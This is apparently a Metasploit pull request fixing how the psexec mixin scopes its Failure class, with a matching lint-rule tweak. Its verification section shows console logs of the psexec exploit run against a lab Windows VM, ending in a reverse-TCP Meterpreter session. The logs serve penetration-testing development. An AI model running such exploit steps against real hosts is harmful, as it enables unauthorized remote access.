### PR TITLE
fix Failure scoping (needed for libraries) for psexec

### DIFF
--- a/lib/msf/core/exploit/smb/client/psexec.rb
+++ b/lib/msf/core/exploit/smb/client/psexec.rb
@@ -265,7 +265,7 @@ module Exploit::Remote::SMB::Client::Psexec
     begin
       psexec(command)
     rescue StandardError => exec_command_error
-      fail_with(Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
+      fail_with(Msf::Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
     end
   end
 

--- a/tools/dev/msftidy.rb
+++ b/tools/dev/msftidy.rb
@@ -608,7 +608,7 @@ class Msftidy
       end
 
       if ln =~ /^\s*fail_with\(/
-        unless ln =~ /^\s*fail_with\(Failure\:\:(?:None|Unknown|Unreachable|BadConfig|Disconnected|NotFound|UnexpectedReply|TimeoutExpired|UserInterrupt|NoAccess|NoTarget|NotVulnerable|PayloadFailed),/
+        unless ln =~ /^\s*fail_with\(.*Failure\:\:(?:None|Unknown|Unreachable|BadConfig|Disconnected|NotFound|UnexpectedReply|TimeoutExpired|UserInterrupt|NoAccess|NoTarget|NotVulnerable|PayloadFailed),/
           error("fail_with requires a valid Failure:: reason as first parameter: #{ln}", idx)
         end
       end


### PR DESCRIPTION
This adds the explicit path to MSF::Exploit::Failure so that we do use the wrong scope when resolving the failure class. Fixes #11627

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/windows/smb/psexec`
- [x] Configure the module, and start a Windows 10 VM
- [x] While the VM is booting, run `psexec` against it over and over.
- [x] **Verify** You see various errors that are caught by the exception code, that show real failures due to the VM target not being fully booted yet.
- [x] **Verify** we don't see any internal Ruby-related failures

```
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.102:445 - Connecting to the server...
[*] 192.168.56.102:445 - Authenticating to 192.168.56.102:445 as user 'bcook'...
[*] 192.168.56.102:445 - Selecting PowerShell target
[*] 192.168.56.102:445 - Executing the payload...
[-] 192.168.56.102:445 - Unable to remove the service, ERROR_CODE: 1053
[-] 192.168.56.102:445 - Exploit aborted due to failure: unknown: 192.168.56.102:445 - Unable to execute specified command: Expecting SMB2 protocol with command=9, got SMB2 protocol with command=8
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.102:445 - Connecting to the server...
[*] 192.168.56.102:445 - Authenticating to 192.168.56.102:445 as user 'bcook'...
[*] 192.168.56.102:445 - Selecting PowerShell target
[*] 192.168.56.102:445 - Executing the payload...
[-] 192.168.56.102:445 - Exploit aborted due to failure: unknown: 192.168.56.102:445 - Unable to execute specified command: Not a valid SMB packet
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.102:445 - Connecting to the server...
[*] 192.168.56.102:445 - Authenticating to 192.168.56.102:445 as user 'bcook'...
[*] 192.168.56.102:445 - Selecting PowerShell target
[*] 192.168.56.102:445 - Executing the payload...
[+] 192.168.56.102:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:58937) at 2019-04-08 10:03:01 -0500

meterpreter >
```